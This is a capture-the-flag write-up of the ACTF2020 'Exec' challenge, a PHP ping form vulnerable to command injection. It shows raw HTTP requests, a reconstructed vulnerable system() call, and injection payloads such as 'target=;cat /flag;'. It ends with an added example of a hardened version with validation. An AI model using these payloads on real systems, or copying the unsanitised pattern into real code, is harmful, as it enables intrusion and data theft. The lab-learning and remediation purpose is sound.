[ACTF2020 新生賽]Exec

Posted by imtaieee on 2024-10-31

Challenge link: https://buuoj.cn/challenges#[ACTF2020 新生賽]Exec.

After opening the challenge, the environment looks as follows.

Try entering "127.0.0.1" and capture the request.

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 16
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=127.0.0.1

Inspect the response.

HTTP/1.1 200 OK
Server: openresty
Date: Tue, 22 Oct 2024 16:25:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.13
Cache-Control: no-cache
Content-Length: 960

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>command execution</title>
    <link href="http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet" />


</head>
<body>

<h1>PING</h1>
<form class="form-inline" method="post">

    <div class="input-group">
        <input style="width:280px;" id="target" type="text" class="form-control" placeholder="請輸入需要ping的地址" aria-describedby="basic-addon1" name="target">
    </div>
    <br/>
    <br/>

    <button  style="width:280px;" class="btn btn-default">PING</button>


</form>
<br /><pre>
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.033 ms
64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.063 ms
64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.060 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.033/0.052/0.063 ms
</pre></body>
</html>

It can be seen that the backend apparently takes the user's input from the target parameter, concatenates it onto a ping command, and executes the result as a system command. The backend code is presumably implemented roughly as follows (in fact, the source can be read through this challenge's vulnerability: target=;cat index.php).

<?php
// Vulnerable pattern: the user-controlled value is concatenated straight into the shell line,
// so shell metacharacters such as ";" terminate ping and start a second command.
if (isset($_POST['target'])) {
	system("ping -c 3 ".$_POST['target']);
}

Therefore, appending to the command directly is enough to read the flag.

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 18
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=;cat /flag;
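As an added example (not the challenge's own source and not part of the original writeup), the following PHP places the vulnerable concatenation pattern next to a hardened version. The only name taken from the challenge is the target form field; the function names, the hostname regular expression and the sample inputs are constructed for illustration.

```php
<?php
// Added example: vulnerable pattern beside a hardened one. Assumes only the
// "target" POST field from the challenge; all function names are hypothetical.

// Vulnerable: untrusted input is concatenated into the shell line, so a
// value such as ";cat /flag;" ends the ping command and starts another.
function ping_vulnerable(string $target): string
{
    return "ping -c 3 " . $target;
}

// Hardened: allow-list the value (IP address or hostname), then quote it as
// a single argument. Returns null when the value is rejected.
function build_ping_command(string $target): ?string
{
    $target = trim($target);

    $is_ip = filter_var($target, FILTER_VALIDATE_IP) !== false;

    // Hostname: dot-separated labels of letters, digits and hyphens, no label
    // starting or ending with a hyphen, at most 253 characters in total.
    $label   = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    $is_host = strlen($target) <= 253
        && preg_match('/^' . $label . '(\.' . $label . ')*$/', $target) === 1;

    if (!$is_ip && !$is_host) {
        return null;   // reject outright rather than trying to "clean" the input
    }

    // escapeshellarg() wraps the value in single quotes so that any remaining
    // shell metacharacters are passed to ping literally, never interpreted.
    return "ping -c 3 " . escapeshellarg($target);
}

// Request handler: validates, logs rejected values for detection, and only
// then would hand the command to system().
function handle_request(array $post): string
{
    if (!isset($post['target']) || !is_string($post['target'])) {
        return "missing target";
    }
    $cmd = build_ping_command($post['target']);
    if ($cmd === null) {
        // Hex-encode so the log line itself cannot carry control characters.
        error_log("rejected ping target: " . bin2hex($post['target']));
        return "invalid target";
    }
    // system($cmd) would run here; the command string is returned for the demo.
    return $cmd;
}

// Demonstration with constructed inputs.
var_dump(build_ping_command("127.0.0.1"));    // string "ping -c 3 '127.0.0.1'"
var_dump(build_ping_command("example.com"));  // string "ping -c 3 'example.com'"
var_dump(build_ping_command(";cat /flag;"));  // NULL: rejected by the allow-list
var_dump(handle_request(["target" => ";cat /flag;"]));  // string "invalid target"
```

The allow-list check is the actual control; escapeshellarg() is defence in depth in case the validation is later loosened. Logging rejected values gives a simple detection signal: a burst of "rejected ping target" entries from one client is exactly the probing traffic shown in the request above.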
